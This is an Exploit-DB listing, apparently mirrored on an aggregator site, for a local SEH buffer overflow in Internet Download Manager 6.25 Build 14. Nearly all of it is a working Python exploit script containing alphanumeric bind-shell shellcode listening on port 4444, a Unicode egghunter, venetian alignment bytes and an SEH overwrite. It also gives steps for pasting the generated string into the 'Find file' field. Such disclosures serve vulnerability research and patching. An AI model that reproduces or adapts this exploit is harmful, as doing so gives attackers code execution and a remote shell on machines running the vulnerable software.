Internet Download Manager 6.25 Build 14 – ‘Find file’ Unicode (SEH)

• Exploit Database
• 18 阅读

• 作者： Rakan Alotaibi
  日期： 2016-03-21
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39579/

• #!/usr/bin/python
  
  # Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
  # Date: 20-3-2016
  # Exploit Author: Rakan Alotaibi
  # Contact: https://twitter.com/hxteam
  # Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
  # Tested on: Windows 7 SP1 x86
  # How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox
  
  tag = "AvAv"
  
  # msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
  shellcode = (
  "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
  "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
  "BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
  "LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
  "0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
  "5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
  "OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
  "PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
  "PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
  "W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
  "QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
  "VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
  "GMCCB2OBJKPQCKO9EAA")
  
  # Windows NtAccessCheckAndAuditAlarm EggHunter
  # Size: 32 bytes
  egghunter = (
  "PPYAIAIAIAIAQATA"
  "XAZAPA3QADAZABAR"
  "ALAYAIAQAIAQAPA5"
  "AAAPAZ1AI1AIAIAJ"
  "11AIAIAXA58AAPAZ"
  "ABABQI1AIQIAIQI1"
  "111AIAJQI1AYAZBA"
  "BABABAB30APB944J"
  "BQV51HJKOLOPBR2Q"
  "ZKRPXXMNNOLKUPZ2"
  "TJOWHKPOQKPT6DKJ"
  "ZVOT5ZJVOBUK7KOK"
  "7LJA")
  
  buffersize = 6000
  nseh = "\x61\x47" # popad + venetian pad
  seh ="\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
  venalign = (
  "\x47" # venetian pad
  "\x55" # push ebp
  "\x47" # venetian pad
  "\x58" # pop eax
  "\x47" # venetian pad
  "\x05\x18\x11" # add eax,11001800
  "\x47" # venetian pad
  "\x2d\x17\x11" # sub eax,11001700
  "\x47" # venetian pad
  "\x50" # push eax
  "\x47" # venetian pad
  "\xc3" # ret
  )
  
  venalign2 = (
  "\x43" # venetian pad
  "\x47" # inc edi
  "\x43" # venetian pad
  "\x57" # push edi
  "\x43" # venetian pad
  "\x58" # pop eax
  "\x43" # venetian pad
  "\x05\x18\x11" # add eax,11001800
  "\x43" # venetian pad
  "\x2d\x17\x11" # sub eax,11001700
  "\x43" # venetian pad
  "\x50" # push eax
  "\x43" # venetian pad
  "\xc3" # ret
  )
  
  junk2 = "\x71" * 108
  junk3 = "\x71" * 110
  evil2 = tag +venalign2 + junk3 + shellcode
  junk = "\x42" * (2192-(len(evil2)))
  evil =junk + evil2 + nseh + seh + venalign + junk2 + egghunter
  fill = "\x47" * (buffersize-len(evil))
  buffer = evil + fill
  
  filename = "exploit.txt"
  file = open(filename, 'w')
  file.write(buffer)
  file.close()
  print buffer
  print "[+] File created successfully"